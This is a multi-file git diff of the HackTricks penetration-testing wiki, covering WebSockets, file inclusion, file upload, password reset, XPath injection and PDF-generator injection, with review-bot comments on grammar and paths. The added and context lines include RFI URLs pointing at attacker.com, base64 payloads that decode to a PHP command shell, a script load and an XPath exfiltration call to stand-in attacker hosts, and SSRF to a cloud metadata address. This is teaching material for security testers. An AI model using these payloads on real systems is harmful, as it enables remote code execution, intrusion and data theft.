<figure><img src="../../.gitbook/assets/image (1) (3).png" alt=""><figcaption></figcaption></figure>
|
||||||
|
|
||||||
**HackenProof is home to all crypto bug bounties.**
|
**HackenProof is home to all crypto bug bounties.**
|
||||||
|
|
||||||
|
@ -611,7 +611,7 @@ If you know how to exfiltrate info with WebRTC [**send a pull request please!**]
|
||||||
|
|
||||||
|
|
||||||
|
|
||||||
<figure><img src="../../.gitbook/assets/image (1).png" alt=""><figcaption></figcaption></figure>
|
<figure><img src="../../.gitbook/assets/image (1) (3).png" alt=""><figcaption></figcaption></figure>
|
||||||
|
|
||||||
**HackenProof is home to all crypto bug bounties.**
|
**HackenProof is home to all crypto bug bounties.**
|
||||||
|
|
||||||
|
|
|
@ -7,7 +7,7 @@
|
||||||
* Do you work in a **cybersecurity company**? Do you want to see your **company advertised in HackTricks**? or do you want to have access to the **latest version of the PEASS or download HackTricks in PDF**? Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
|
* Do you work in a **cybersecurity company**? Do you want to see your **company advertised in HackTricks**? or do you want to have access to the **latest version of the PEASS or download HackTricks in PDF**? Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
|
||||||
* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family)
|
* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family)
|
||||||
* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
|
* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
|
||||||
* **Join the** [**💬**](https://emojipedia.org/speech-balloon/) [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
|
* **Join the** [**💬**](https://emojipedia.org/speech-balloon/) [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/hacktricks\_live)**.**
|
||||||
* **Share your hacking tricks by submitting PRs to the** [**hacktricks repo**](https://github.com/carlospolop/hacktricks) **and** [**hacktricks-cloud repo**](https://github.com/carlospolop/hacktricks-cloud).
|
* **Share your hacking tricks by submitting PRs to the** [**hacktricks repo**](https://github.com/carlospolop/hacktricks) **and** [**hacktricks-cloud repo**](https://github.com/carlospolop/hacktricks-cloud).
|
||||||
|
|
||||||
</details>
|
</details>
|
||||||
|
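Review bot: the only change in this hunk is the underscore in the Twitter link destination becoming `https://twitter.com/hacktricks\_live`. CommonMark strips backslash escapes in link destinations, so it renders the same, but link checkers and renderers that take destinations literally will request a URL containing a backslash, and the other footer copies in this same diff keep the unescaped form. Prefer the plain `https://twitter.com/hacktricks_live` for consistency.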
@ -85,10 +85,22 @@ Once the client is trying to connect to you can then use:
|
||||||
websocat -E --insecure --text ws-listen:0.0.0.0:8000 wss://10.10.10.10:8000 -v
|
websocat -E --insecure --text ws-listen:0.0.0.0:8000 wss://10.10.10.10:8000 -v
|
||||||
```
|
```
|
||||||
|
|
||||||
## Websockets Enumeration
|
## Websockets enumeration
|
||||||
|
|
||||||
You can use the **tool** [**https://github.com/PalindromeLabs/STEWS**](https://github.com/PalindromeLabs/STEWS) **to discover, fingerprint and search for known** **vulnerabilities** in websockets automatically.
|
You can use the **tool** [**https://github.com/PalindromeLabs/STEWS**](https://github.com/PalindromeLabs/STEWS) **to discover, fingerprint and search for known** **vulnerabilities** in websockets automatically.
|
||||||
|
|
||||||
|
## Websocket Debug tools
|
||||||
|
|
||||||
|
* **Burp Suite** supports MitM websockets communication in a very similar way it does it for regular HTTP communication.
|
||||||
|
* [**WSSiP**](https://github.com/nccgroup/wssip)**:** Short for "**WebSocket/Socket.io Proxy**", this tool, written in Node.js, provides a user interface to **capture, intercept, send custom** messages and view all WebSocket and Socket.IO communications between the client and server.
|
||||||
|
* [**wsrepl**](https://github.com/doyensec/wsrepl) is an **interactive websocket REPL** designed specifically for penetration testing. It provides an interface for observing **incoming websocket messages and sending new ones**, with an easy-to-use framework for **automating** this communication. 
|
||||||
|
* [**https://websocketking.com/**](https://websocketking.com/) it's a **web to communicate** with other webs using **websockets**.
|
||||||
|
* [**https://hoppscotch.io/realtime/websocket**](https://hoppscotch.io/realtime/websocket) among other types of communications/protocols, it provides a **web to communicate** with other webs using **websockets.**
|
||||||
|
|
||||||
|
## Websocket Lab
|
||||||
|
|
||||||
|
In [**Burp-Suite-Extender-Montoya-Course**](https://github.com/federicodotta/Burp-Suite-Extender-Montoya-Course) you have a code to launch a web using websockets and in [**this post**](https://security.humanativaspa.it/extending-burp-suite-for-fun-and-profit-the-montoya-way-part-3/) you can find an explanation.
|
||||||
|
|
||||||
## Cross-site WebSocket hijacking (CSWSH)
|
## Cross-site WebSocket hijacking (CSWSH)
|
||||||
|
|
||||||
Also known as _cross-origin WebSocket hijacking_.\
|
Also known as _cross-origin WebSocket hijacking_.\
|
||||||
|
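Review bot: the three new bullets under "## Websocket Debug tools" and the "## Websocket Lab" paragraph need a grammar pass before merge. "supports MitM websockets communication in a very similar way it does it for regular HTTP communication" reads better as "supports intercepting WebSocket traffic much as it does regular HTTP"; "it's a **web to communicate** with other webs using **websockets**" (used twice) should be "a web client for talking to WebSocket servers"; the wsrepl bullet ends in a non-breaking space; and "you have a code to launch a web using websockets" should be "there is code to launch a WebSocket-based web app". Also worth a sentence under the debug-tools list: all of these are intercepting proxies, so defenders testing their own apps should confirm the server enforces the `Origin` check and per-message authorization through the proxy, which is exactly what the CSWSH section below depends on.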
@ -176,7 +188,7 @@ This vulnerability could allow you to **bypass reverse proxies restrictions** by
|
||||||
* Do you work in a **cybersecurity company**? Do you want to see your **company advertised in HackTricks**? or do you want to have access to the **latest version of the PEASS or download HackTricks in PDF**? Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
|
* Do you work in a **cybersecurity company**? Do you want to see your **company advertised in HackTricks**? or do you want to have access to the **latest version of the PEASS or download HackTricks in PDF**? Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
|
||||||
* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family)
|
* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family)
|
||||||
* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
|
* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
|
||||||
* **Join the** [**💬**](https://emojipedia.org/speech-balloon/) [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
|
* **Join the** [**💬**](https://emojipedia.org/speech-balloon/) [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/hacktricks\_live)**.**
|
||||||
* **Share your hacking tricks by submitting PRs to the** [**hacktricks repo**](https://github.com/carlospolop/hacktricks) **and** [**hacktricks-cloud repo**](https://github.com/carlospolop/hacktricks-cloud).
|
* **Share your hacking tricks by submitting PRs to the** [**hacktricks repo**](https://github.com/carlospolop/hacktricks) **and** [**hacktricks-cloud repo**](https://github.com/carlospolop/hacktricks-cloud).
|
||||||
|
|
||||||
</details>
|
</details>
|
||||||
|
|
|
@ -12,7 +12,7 @@
|
||||||
|
|
||||||
</details>
|
</details>
|
||||||
|
|
||||||
<figure><img src="../../.gitbook/assets/image (1).png" alt=""><figcaption></figcaption></figure>
|
<figure><img src="../.gitbook/assets/image (1) (3).png" alt=""><figcaption></figcaption></figure>
|
||||||
|
|
||||||
**HackenProof is home to all crypto bug bounties.**
|
**HackenProof is home to all crypto bug bounties.**
|
||||||
|
|
||||||
|
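Review bot: the replacement figure path changes directory depth, not just the file name: `../../.gitbook/assets/image (1).png` becomes `../.gitbook/assets/image (1) (3).png`. The figure near line 603 of the same file (third hunk) already used `../.gitbook/...` before this change, so either line 12 was previously broken and this fixes it, or one of the two is wrong; confirm where the file sits relative to `.gitbook/` so both figures resolve after merge.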
@ -190,9 +190,7 @@ To set the domain name of the server in the URL that the Referrer is going to se
|
||||||
</html>
|
</html>
|
||||||
```
|
```
|
||||||
|
|
||||||
|
<figure><img src="../.gitbook/assets/image (1) (3).png" alt=""><figcaption></figcaption></figure>
|
||||||
|
|
||||||
<figure><img src="../../.gitbook/assets/image (1).png" alt=""><figcaption></figcaption></figure>
|
|
||||||
|
|
||||||
**HackenProof is home to all crypto bug bounties.**
|
**HackenProof is home to all crypto bug bounties.**
|
||||||
|
|
||||||
|
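Review bot: besides moving the figure up so it follows the closing ``` fence with one blank line, this hunk silently changes the path depth from `../../` to `../`. That matches the figure near line 603 of this file, which already used `../`, but it is a second depth change in one commit with no explanation in the subject-less change request; a one-line note in the commit message saying the page lives one level below the repo root would make the intent reviewable.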
@ -603,7 +601,7 @@ with open(PASS_LIST, "r") as f:
|
||||||
|
|
||||||
|
|
||||||
|
|
||||||
<figure><img src="../.gitbook/assets/image (1).png" alt=""><figcaption></figcaption></figure>
|
<figure><img src="../.gitbook/assets/image (1) (3).png" alt=""><figcaption></figcaption></figure>
|
||||||
|
|
||||||
**HackenProof is home to all crypto bug bounties.**
|
**HackenProof is home to all crypto bug bounties.**
|
||||||
|
|
||||||
|
|
|
@ -12,7 +12,7 @@
|
||||||
|
|
||||||
</details>
|
</details>
|
||||||
|
|
||||||
<figure><img src="../../.gitbook/assets/image (1).png" alt=""><figcaption></figcaption></figure>
|
<figure><img src="../../.gitbook/assets/image (1) (3).png" alt=""><figcaption></figcaption></figure>
|
||||||
|
|
||||||
**HackenProof is home to all crypto bug bounties.**
|
**HackenProof is home to all crypto bug bounties.**
|
||||||
|
|
||||||
|
@ -187,13 +187,35 @@ Maintain the initial path: http://example.com/index.php?page=/var/www/../../etc/
|
||||||
http://example.com/index.php?page=PhP://filter
|
http://example.com/index.php?page=PhP://filter
|
||||||
```
|
```
|
||||||
|
|
||||||
## Basic RFI
|
## Remote File Inclusion
|
||||||
|
|
||||||
|
In php this is disable by default because **`allow_url_include`** is **Off.** It must be **On** for it to work, and in that case you could include a PHP file from your server and get RCE:
|
||||||
|
|
||||||
```python
|
```python
|
||||||
http://example.com/index.php?page=http://atacker.com/mal.php
|
http://example.com/index.php?page=http://atacker.com/mal.php
|
||||||
http://example.com/index.php?page=\\attacker.com\shared\mal.php
|
http://example.com/index.php?page=\\attacker.com\shared\mal.php
|
||||||
```
|
```
|
||||||
|
|
||||||
|
If for some reason **`allow_url_include`** is **On**, but PHP is **filtering** access to external webpages, [according to this post](https://matan-h.com/one-lfi-bypass-to-rule-them-all-using-base64/), you could use for example the data protocol with base64 to decode a b64 PHP code and egt RCE:
|
||||||
|
|
||||||
|
{% code overflow="wrap" %}
|
||||||
|
```
|
||||||
|
PHP://filter/convert.base64-decode/resource=data://plain/text,PD9waHAgc3lzdGVtKCRfR0VUWydjbWQnXSk7ZWNobyAnU2hlbGwgZG9uZSAhJzsgPz4+.txt
|
||||||
|
```
|
||||||
|
{% endcode %}
|
||||||
|
|
||||||
|
{% hint style="info" %}
|
||||||
|
In the previous code, the final `+.txt` was added because the attacker needed a string that ended in `.txt`, so the string ends with it and after the b64 decode that part will return just junk and the real PHP code will be included (and therefore, executed).
|
||||||
|
{% endhint %}
|
||||||
|
|
||||||
|
Another example **not using the `php://` protocol** would be:
|
||||||
|
|
||||||
|
{% code overflow="wrap" %}
|
||||||
|
```
|
||||||
|
data://text/plain;base64,PD9waHAgc3lzdGVtKCRfR0VUWydjbWQnXSk7ZWNobyAnU2hlbGwgZG9uZSAhJzsgPz4+txt
|
||||||
|
```
|
||||||
|
{% endcode %}
|
||||||
|
|
||||||
## Python Root element
|
## Python Root element
|
||||||
|
|
||||||
In python in a code like this one:
|
In python in a code like this one:
|
||||||
|
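Review bot: the two data-wrapper examples added here disagree with each other and with the hint that explains them. The first resource is `data://plain/text,...` while the second is `data://text/plain;base64,...`; the RFC 2397 form is `data:text/plain`, so one of them needs correcting. The hint says the trailing `+.txt` was added to satisfy an extension check, but the second payload ends in `+txt` with no dot, so the explanation does not match the example it sits next to. Smaller points in the same hunk: the fence stays tagged ```python although it holds URLs (use a bare fence or ```url as elsewhere on the page), "In php this is disable by default" should be "disabled", and "egt RCE" should be "get RCE". Since the paragraph already states that `allow_url_include` is Off by default, it would help defenders to add that the `data://` wrapper used in both examples is subject to the same setting, so leaving it Off blocks this whole subsection.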
@ -449,7 +471,7 @@ It's also possible to get RCE in a vulnerable "assert" statement using the syste
|
||||||
|
|
||||||
Be sure to URL-encode payloads before you send them.
|
Be sure to URL-encode payloads before you send them.
|
||||||
|
|
||||||
<figure><img src="../../.gitbook/assets/image (1).png" alt=""><figcaption></figcaption></figure>
|
<figure><img src="../../.gitbook/assets/image (1) (3).png" alt=""><figcaption></figcaption></figure>
|
||||||
|
|
||||||
**HackenProof is home to all crypto bug bounties.**
|
**HackenProof is home to all crypto bug bounties.**
|
||||||
|
|
||||||
|
@ -484,12 +506,9 @@ For the technical details check the mentioned post!
|
||||||
|
|
||||||
## LFI2RCE
|
## LFI2RCE
|
||||||
|
|
||||||
### Basic RFI
|
### Remote File Inclusion
|
||||||
|
|
||||||
```python
|
Explained previously, [**follow this link**](./#remote-file-inclusion).
|
||||||
http://example.com/index.php?page=http://atacker.com/mal.php
|
|
||||||
http://example.com/index.php?page=\\attacker.com\shared\mal.php
|
|
||||||
```
|
|
||||||
|
|
||||||
### Via Apache/Nginx log file
|
### Via Apache/Nginx log file
|
||||||
|
|
||||||
|
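Review bot: renaming "### Basic RFI" to "### Remote File Inclusion" leaves this page with two headings of identical text, so GitBook has to de-duplicate the second slug; the new link `./#remote-file-inclusion` will resolve to the first heading, which is what is intended, but a distinct subsection title such as "RFI (see above)" avoids the ambiguity and keeps future anchors stable. The replaced code block also duplicated the `http://atacker.com/mal.php` typo from the earlier section, so dropping it is the right call rather than fixing it twice.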
@ -589,14 +608,17 @@ If ssh is active check which user is being used (/proc/self/status & /etc/passwd
|
||||||
### **Via** **vsftpd** _**logs**_
|
### **Via** **vsftpd** _**logs**_
|
||||||
|
|
||||||
The logs of this FTP server are stored in _**/var/log/vsftpd.log.**_ If you have a LFI and can access a exposed vsftpd server, you could try to login setting the PHP payload in the username and then access the logs using the LFI.
|
The logs of this FTP server are stored in _**/var/log/vsftpd.log.**_ If you have a LFI and can access a exposed vsftpd server, you could try to login setting the PHP payload in the username and then access the logs using the LFI.
|
||||||
|
|
||||||
### Via php base64 filter (using base64)
|
### Via php base64 filter (using base64)
|
||||||
as shown in [this](https://matan-h.com/one-lfi-bypass-to-rule-them-all-using-base64) article,PHP base64 filter just ignore Non-base64.You can use that to bypass the file extension check: if you supply base64 that ends with ".php", and it would just ignore the "." and append "php" to the base64.
|
|
||||||
Here is an example payload:
|
as shown in [this](https://matan-h.com/one-lfi-bypass-to-rule-them-all-using-base64) article,PHP base64 filter just ignore Non-base64.You can use that to bypass the file extension check: if you supply base64 that ends with ".php", and it would just ignore the "." and append "php" to the base64. Here is an example payload:
|
||||||
|
|
||||||
```url
|
```url
|
||||||
http://example.com/index.php?page=PHP://filter/convert.base64-decode/resource=data://plain/text,PD9waHAgc3lzdGVtKCRfR0VUWydjbWQnXSk7ZWNobyAnU2hlbGwgZG9uZSAhJzsgPz4+.php
|
http://example.com/index.php?page=PHP://filter/convert.base64-decode/resource=data://plain/text,PD9waHAgc3lzdGVtKCRfR0VUWydjbWQnXSk7ZWNobyAnU2hlbGwgZG9uZSAhJzsgPz4+.php
|
||||||
|
|
||||||
NOTE: the payload is "<?php system($_GET['cmd']);echo 'Shell done !'; ?>"
|
NOTE: the payload is "<?php system($_GET['cmd']);echo 'Shell done !'; ?>"
|
||||||
```
|
```
|
||||||
|
|
||||||
### Via php filters (no file needed)
|
### Via php filters (no file needed)
|
||||||
|
|
||||||
This [**writeup** ](https://gist.github.com/loknop/b27422d355ea1fd0d90d6dbc1e278d4d)explains that you can use **php filters to generate arbitrary content** as output. Which basically means that you can **generate arbitrary php code** for the include **without needing to write** it into a file.
|
This [**writeup** ](https://gist.github.com/loknop/b27422d355ea1fd0d90d6dbc1e278d4d)explains that you can use **php filters to generate arbitrary content** as output. Which basically means that you can **generate arbitrary php code** for the include **without needing to write** it into a file.
|
||||||
|
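Review bot: the line `NOTE: the payload is "<?php system($_GET['cmd']);echo 'Shell done !'; ?>"` sits inside the ```url fence, so it renders as part of the URL; move it to prose after the closing fence. The reflowed paragraph still has "article,PHP" (missing space) and "just ignore Non-base64" (should be "just ignores non-base64 characters"), and the resource again uses `data://plain/text` where the media type is `text/plain`. The defensive takeaway is missing too: because `convert.base64-decode` discards invalid characters, a suffix allow-list on the include parameter is not a control, and the fix is to never pass user input to `include` at all.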
@ -677,7 +699,7 @@ _Even if you cause a PHP Fatal Error, PHP temporary files uploaded are deleted._
|
||||||
|
|
||||||
{% file src="../../.gitbook/assets/EN-Local-File-Inclusion-1.pdf" %}
|
{% file src="../../.gitbook/assets/EN-Local-File-Inclusion-1.pdf" %}
|
||||||
|
|
||||||
<figure><img src="../../.gitbook/assets/image (1).png" alt=""><figcaption></figcaption></figure>
|
<figure><img src="../../.gitbook/assets/image (1) (3).png" alt=""><figcaption></figcaption></figure>
|
||||||
|
|
||||||
**HackenProof is home to all crypto bug bounties.**
|
**HackenProof is home to all crypto bug bounties.**
|
||||||
|
|
||||||
|
|
|
@ -90,8 +90,6 @@ Other useful extensions:
|
||||||
* Another technique to make a payload that **survives an image resizing**, using the PHP-GD function `thumbnailImage`. However, you could use the **tEXt chunk** [**technique defined here**](https://www.synacktiv.com/publications/persistent-php-payloads-in-pngs-how-to-inject-php-code-in-an-image-and-keep-it-there.html) to insert some text that will **survive compression**.
|
* Another technique to make a payload that **survives an image resizing**, using the PHP-GD function `thumbnailImage`. However, you could use the **tEXt chunk** [**technique defined here**](https://www.synacktiv.com/publications/persistent-php-payloads-in-pngs-how-to-inject-php-code-in-an-image-and-keep-it-there.html) to insert some text that will **survive compression**.
|
||||||
* [**Github with the code**](https://github.com/synacktiv/astrolock/blob/main/payloads/generators/gen\_tEXt\_png.php)
|
* [**Github with the code**](https://github.com/synacktiv/astrolock/blob/main/payloads/generators/gen\_tEXt\_png.php)
|
||||||
|
|
||||||
|
|
||||||
|
|
||||||
### Other Tricks to check
|
### Other Tricks to check
|
||||||
|
|
||||||
* Find a vulnerability to **rename** the file already uploaded (to change the extension).
|
* Find a vulnerability to **rename** the file already uploaded (to change the extension).
|
||||||
|
@ -118,7 +116,7 @@ The `.inc` extension is sometimes used for php files that are only used to **imp
|
||||||
|
|
||||||
If you can upload a XML file into a Jetty server you can obtain [RCE because **new \*.xml and \*.war are automatically processed**](https://twitter.com/ptswarm/status/1555184661751648256/photo/1)**.** So, as mentioned in the following image, upload the XML file to `$JETTY_BASE/webapps/` and expect the shell!
|
If you can upload a XML file into a Jetty server you can obtain [RCE because **new \*.xml and \*.war are automatically processed**](https://twitter.com/ptswarm/status/1555184661751648256/photo/1)**.** So, as mentioned in the following image, upload the XML file to `$JETTY_BASE/webapps/` and expect the shell!
|
||||||
|
|
||||||
![](<../../.gitbook/assets/image (1) (3) (1).png>)
|
![](<../../.gitbook/assets/image (1) (3) (1) (1).png>)
|
||||||
|
|
||||||
## **uWSGI RCE**
|
## **uWSGI RCE**
|
||||||
|
|
||||||
|
@ -184,8 +182,11 @@ Note that **another option** you may be thinking of to bypass this check is to m
|
||||||
* [https://github.com/modzero/mod0BurpUploadScanner](https://github.com/modzero/mod0BurpUploadScanner)
|
* [https://github.com/modzero/mod0BurpUploadScanner](https://github.com/modzero/mod0BurpUploadScanner)
|
||||||
* [https://github.com/almandin/fuxploider](https://github.com/almandin/fuxploider)
|
* [https://github.com/almandin/fuxploider](https://github.com/almandin/fuxploider)
|
||||||
* [https://blog.doyensec.com/2023/02/28/new-vector-for-dirty-arbitrary-file-write-2-rce.html](https://blog.doyensec.com/2023/02/28/new-vector-for-dirty-arbitrary-file-write-2-rce.html)
|
* [https://blog.doyensec.com/2023/02/28/new-vector-for-dirty-arbitrary-file-write-2-rce.html](https://blog.doyensec.com/2023/02/28/new-vector-for-dirty-arbitrary-file-write-2-rce.html)
|
||||||
|
|
||||||
## Tools
|
## Tools
|
||||||
* [Upload Bypass](https://github.com/sAjibuu/Upload_Bypass) is a powerful tool designed to assist Pentesters and Bug Hunters in testing file upload mechanisms. It leverages various bug bounty techniques to simplify the process of identifying and exploiting vulnerabilities, ensuring thorough assessments of web applications.
|
|
||||||
|
* [Upload Bypass](https://github.com/sAjibuu/Upload\_Bypass) is a powerful tool designed to assist Pentesters and Bug Hunters in testing file upload mechanisms. It leverages various bug bounty techniques to simplify the process of identifying and exploiting vulnerabilities, ensuring thorough assessments of web applications.
|
||||||
|
|
||||||
## From File upload to other vulnerabilities
|
## From File upload to other vulnerabilities
|
||||||
|
|
||||||
* Set **filename** to `../../../tmp/lol.png` and try to achieve a **path traversal**
|
* Set **filename** to `../../../tmp/lol.png` and try to achieve a **path traversal**
|
||||||
|
|
|
@ -12,7 +12,7 @@
|
||||||
|
|
||||||
</details>
|
</details>
|
||||||
|
|
||||||
<figure><img src="../.gitbook/assets/image (1).png" alt=""><figcaption></figcaption></figure>
|
<figure><img src="../.gitbook/assets/image (1) (3).png" alt=""><figcaption></figcaption></figure>
|
||||||
|
|
||||||
**HackenProof is home to all crypto bug bounties.**
|
**HackenProof is home to all crypto bug bounties.**
|
||||||
|
|
||||||
|
@ -327,7 +327,7 @@ The **reset tokens must have an expiration time**, after it the token shouldn't
|
||||||
* Long password (>200) leads to DoS
|
* Long password (>200) leads to DoS
|
||||||
* Append second email param and value
|
* Append second email param and value
|
||||||
|
|
||||||
<figure><img src="../.gitbook/assets/image (1).png" alt=""><figcaption></figcaption></figure>
|
<figure><img src="../.gitbook/assets/image (1) (3).png" alt=""><figcaption></figcaption></figure>
|
||||||
|
|
||||||
**HackenProof is home to all crypto bug bounties.**
|
**HackenProof is home to all crypto bug bounties.**
|
||||||
|
|
||||||
|
|
|
@ -12,7 +12,7 @@
|
||||||
|
|
||||||
</details>
|
</details>
|
||||||
|
|
||||||
<figure><img src="../.gitbook/assets/image (1).png" alt=""><figcaption></figcaption></figure>
|
<figure><img src="../.gitbook/assets/image (1) (3).png" alt=""><figcaption></figcaption></figure>
|
||||||
|
|
||||||
**HackenProof is home to all crypto bug bounties.**
|
**HackenProof is home to all crypto bug bounties.**
|
||||||
|
|
||||||
|
@ -86,7 +86,7 @@ Info about how to make queries: [https://www.w3schools.com/xml/xpath\_syntax.asp
|
||||||
| //\* | Selects all elements in the document |
|
| //\* | Selects all elements in the document |
|
||||||
| //title\[@\*] | Selects all title elements which have at least one attribute of any kind |
|
| //title\[@\*] | Selects all title elements which have at least one attribute of any kind |
|
||||||
|
|
||||||
<figure><img src="../.gitbook/assets/image (1).png" alt=""><figcaption></figcaption></figure>
|
<figure><img src="../.gitbook/assets/image (1) (3).png" alt=""><figcaption></figcaption></figure>
|
||||||
|
|
||||||
**HackenProof is home to all crypto bug bounties.**
|
**HackenProof is home to all crypto bug bounties.**
|
||||||
|
|
||||||
|
@ -332,7 +332,7 @@ doc-available(concat("http://hacker.com/oob/", RESULTS))
|
||||||
|
|
||||||
{% embed url="https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/XPATH%20injection" %}
|
{% embed url="https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/XPATH%20injection" %}
|
||||||
|
|
||||||
<figure><img src="../.gitbook/assets/image (1).png" alt=""><figcaption></figcaption></figure>
|
<figure><img src="../.gitbook/assets/image (1) (3).png" alt=""><figcaption></figcaption></figure>
|
||||||
|
|
||||||
**HackenProof is home to all crypto bug bounties.**
|
**HackenProof is home to all crypto bug bounties.**
|
||||||
|
|
||||||
|
|
|
@ -7,7 +7,7 @@
|
||||||
* Do you work in a **cybersecurity company**? Do you want to see your **company advertised in HackTricks**? or do you want to have access to the **latest version of the PEASS or download HackTricks in PDF**? Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
|
* Do you work in a **cybersecurity company**? Do you want to see your **company advertised in HackTricks**? or do you want to have access to the **latest version of the PEASS or download HackTricks in PDF**? Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
|
||||||
* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family)
|
* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family)
|
||||||
* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
|
* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
|
||||||
* **Join the** [**💬**](https://emojipedia.org/speech-balloon/) [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
|
* **Join the** [**💬**](https://emojipedia.org/speech-balloon/) [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/hacktricks\_live)**.**
|
||||||
* **Share your hacking tricks by submitting PRs to the** [**hacktricks repo**](https://github.com/carlospolop/hacktricks) **and** [**hacktricks-cloud repo**](https://github.com/carlospolop/hacktricks-cloud).
|
* **Share your hacking tricks by submitting PRs to the** [**hacktricks repo**](https://github.com/carlospolop/hacktricks) **and** [**hacktricks-cloud repo**](https://github.com/carlospolop/hacktricks-cloud).
|
||||||
|
|
||||||
</details>
|
</details>
|
||||||
|
@ -20,6 +20,14 @@ So, if the **PDF creator bot finds** some kind of **HTML** **tags**, it is going
|
||||||
Please, notice that the `<script></script>` tags don't work always, so you will need a different method to execute JS (for example, abusing `<img` ).\
|
Please, notice that the `<script></script>` tags don't work always, so you will need a different method to execute JS (for example, abusing `<img` ).\
|
||||||
Also, note that in a regular exploitation you will be **able to see/download the created pdf**, so you will be able to see everything you **write via JS** (using `document.write()` for example). But, if you **cannot see** the created PDF, you will probably need **extract the information making web request to you** (Blind).
|
Also, note that in a regular exploitation you will be **able to see/download the created pdf**, so you will be able to see everything you **write via JS** (using `document.write()` for example). But, if you **cannot see** the created PDF, you will probably need **extract the information making web request to you** (Blind).
|
||||||
|
|
||||||
|
### Popular PDF generation
|
||||||
|
|
||||||
|
* **wkhtmltopdf**: _This is an open source command line tool that uses the WebKit rendering engine to convert HTML and CSS into PDF documents._
|
||||||
|
* **TCPDF**_: A PHP library for generating PDF documents that supports a wide range of features, including images, graphics, and encryption._
|
||||||
|
* **PDFKit :** _A Node.js library that can be used to generate PDF documents from HTML and CSS._
|
||||||
|
* **iText**: _A Java-based library for generating PDF documents that supports a range of features, including digital signatures and form filling._
|
||||||
|
* **FPDF**_: A PHP library for generating PDF documents that is lightweight and easy to use._
|
||||||
|
|
||||||
## Payloads
|
## Payloads
|
||||||
|
|
||||||
### Discovery
|
### Discovery
|
||||||
|
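Review bot: the new "Popular PDF generation" list mixes markup styles (`**TCPDF**_:` and `**FPDF**_:` put the colon inside the italics, `**PDFKit :**` has a space before a bold colon); make the five items uniform. The PDFKit description is also misleading: the Node.js PDFKit builds PDFs programmatically and does not render HTML/CSS (the HTML-to-PDF "pdfkit" is the Python wrapper around wkhtmltopdf). More useful for this page would be to mark which generators run a browser engine (wkhtmltopdf uses WebKit and executes JavaScript, which the payloads below rely on) versus those that render a limited HTML subset without a JavaScript engine (TCPDF, FPDF, iText), since the injection and SSRF techniques on this page apply to the former.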
@ -86,7 +94,13 @@ The best conformable way to exploit this vulnerability is to abuse the vulnerabi
|
||||||
<img src="xasdasdasd" onerror="document.write('<script src="https://attacker.com/test.js"></script>')"/>
|
<img src="xasdasdasd" onerror="document.write('<script src="https://attacker.com/test.js"></script>')"/>
|
||||||
```
|
```
|
||||||
|
|
||||||
### Read local file
|
### Read local file / SSRF
|
||||||
|
|
||||||
|
{% hint style="warning" %}
|
||||||
|
Change `file:///etc/passwd` for `http://169.254.169.254/latest/user-data` for example to **try to access an external web page (SSRF)**.
|
||||||
|
|
||||||
|
If SSRF is allowed, but you **cannot reach** an interesting domain or IP, [check this page for potential bypasses](../ssrf-server-side-request-forgery/url-format-bypass.md).
|
||||||
|
{% endhint %}
|
||||||
|
|
||||||
```markup
|
```markup
|
||||||
<script>
|
<script>
|
||||||
|
